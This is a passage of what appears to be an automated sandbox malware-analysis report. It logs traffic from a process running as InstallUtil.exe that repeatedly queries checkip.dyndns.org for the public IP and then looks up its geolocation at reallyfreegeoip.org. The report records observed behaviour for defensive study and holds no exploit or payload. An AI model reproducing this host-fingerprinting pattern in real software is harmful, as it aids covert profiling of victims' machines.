Sep 12, 2024 21:07:42.898646116 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 12, 2024 21:07:43.103297949 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 12 Sep 2024 19:07:43 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 2e1e9a036f78e8d51cc9396e7bea4425 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 12, 2024 21:07:44.173209906 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 12, 2024 21:07:44.379055023 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 12 Sep 2024 19:07:44 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 154b5c6f8e086404a615ed0614daba86 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49720	132.226.247.73	80	1072	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Sep 12, 2024 21:07:45.029567003 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 12, 2024 21:07:45.897850037 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 12 Sep 2024 19:07:45 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c098f7a26a169156775c65bee430c118 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49722	132.226.247.73	80	1072	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Sep 12, 2024 21:07:46.538378000 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 12, 2024 21:07:47.212412119 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 12 Sep 2024 19:07:47 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 0206123a2863c49e0ae5e62baede3896 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.9	49724	132.226.247.73	80	1072	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Sep 12, 2024 21:07:47.834625006 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 12, 2024 21:07:48.531033039 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 12 Sep 2024 19:07:48 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 470fea409c92d51eae7dc9c9ea5e9fa3 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.9	49726	132.226.247.73	80	1072	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Sep 12, 2024 21:07:49.145601034 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 12, 2024 21:07:49.949414968 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 12 Sep 2024 19:07:49 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 3d83e410c6d3a17d3ecbdb2c8b598f43 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.9	49728	132.226.247.73	80	1072	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Sep 12, 2024 21:07:50.818191051 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 12, 2024 21:07:51.484280109 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 12 Sep 2024 19:07:51 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c1c8a1670e6231a706ed846728abb669 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.9	49730	132.226.247.73	80	1072	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Sep 12, 2024 21:07:52.128988981 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 12, 2024 21:07:53.623356104 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 12 Sep 2024 19:07:52 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 792609841027e9ebd25fd4d4d29c5fac Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 12, 2024 21:07:53.851910114 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 12 Sep 2024 19:07:52 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 792609841027e9ebd25fd4d4d29c5fac Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 12, 2024 21:07:53.852770090 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 12 Sep 2024 19:07:52 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 792609841027e9ebd25fd4d4d29c5fac Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 12, 2024 21:07:53.854387999 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 12 Sep 2024 19:07:52 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 792609841027e9ebd25fd4d4d29c5fac Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.9	49732	132.226.247.73	80	1072	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Sep 12, 2024 21:07:54.497977972 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 12, 2024 21:07:55.160751104 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 12 Sep 2024 19:07:55 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 76094a9a538d69f9ef333271818f6fcb Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.9	49735	132.226.247.73	80	2036	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Sep 12, 2024 21:08:00.382503986 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 12, 2024 21:08:01.076000929 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 12 Sep 2024 19:08:00 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: e60b9ad82b948480039afc0170fa4934 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 12, 2024 21:08:01.080951929 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 12, 2024 21:08:01.292069912 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 12 Sep 2024 19:08:01 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b283ccd04e5dfdb65c97e265440290f6 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 12, 2024 21:08:02.089374065 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 12, 2024 21:08:02.300815105 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 12 Sep 2024 19:08:02 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: e6aa7213d9fbbdf223f6c863c339611e Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.9	49739	132.226.247.73	80	2036	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Sep 12, 2024 21:08:02.935637951 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 12, 2024 21:08:03.610282898 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 12 Sep 2024 19:08:03 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 31e31fdbe354580e306790808f9f6de8 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.9	49741	132.226.247.73	80	2036	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Sep 12, 2024 21:08:04.241550922 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 12, 2024 21:08:04.930140972 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 12 Sep 2024 19:08:04 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 255c66b3e60aa83e17ee3d58d582ca8e Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.9	49743	132.226.247.73	80	2036	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Sep 12, 2024 21:08:05.586869955 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 12, 2024 21:08:06.255065918 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 12 Sep 2024 19:08:06 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 87b0c17917033852d6ffd09b49fb97d9 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.9	49745	132.226.247.73	80	2036	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Sep 12, 2024 21:08:06.877965927 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 12, 2024 21:08:07.542783976 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 12 Sep 2024 19:08:07 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: f83f3e558059b3f77bad74deec7ca35d Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.9	49747	132.226.247.73	80	2036	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Sep 12, 2024 21:08:08.146230936 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 12, 2024 21:08:08.833596945 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 12 Sep 2024 19:08:08 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 49e3953e16b38cb5c2b6d9d765a96e96 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.9	49749	132.226.247.73	80	2036	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Sep 12, 2024 21:08:09.486908913 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 12, 2024 21:08:10.153218031 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 12 Sep 2024 19:08:10 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: ae2c70641db259d1fc4ca5e799753643 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.9	49751	132.226.247.73	80	2036	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Sep 12, 2024 21:08:10.767851114 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 12, 2024 21:08:11.461127996 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 12 Sep 2024 19:08:11 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: bc5a04bb15b9531775226b51d53a4b83 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49718	188.114.97.3	443	1072	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-12 19:07:43 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-12 19:07:44 UTC	698	IN	HTTP/1.1 200 OK Date: Thu, 12 Sep 2024 19:07:44 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: EXPIRED Last-Modified: Thu, 12 Sep 2024 19:07:44 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DcSjr6XJWDZ91uV6cueyoMwrai0GsxKWI8txJ09p2XrcJpdwMmfyPcS45HZBqu66zxlFokL4RBCmLZrNvM1WZO3SPQ02uFCCwLgRIEMwe9ZD%2BzlPz%2F%2BRgGnF8eskWnTqOKg2o3av"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c222e9e6a7d0f5b-EWR alt-svc: h3=":443"; ma=86400
2024-09-12 19:07:44 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 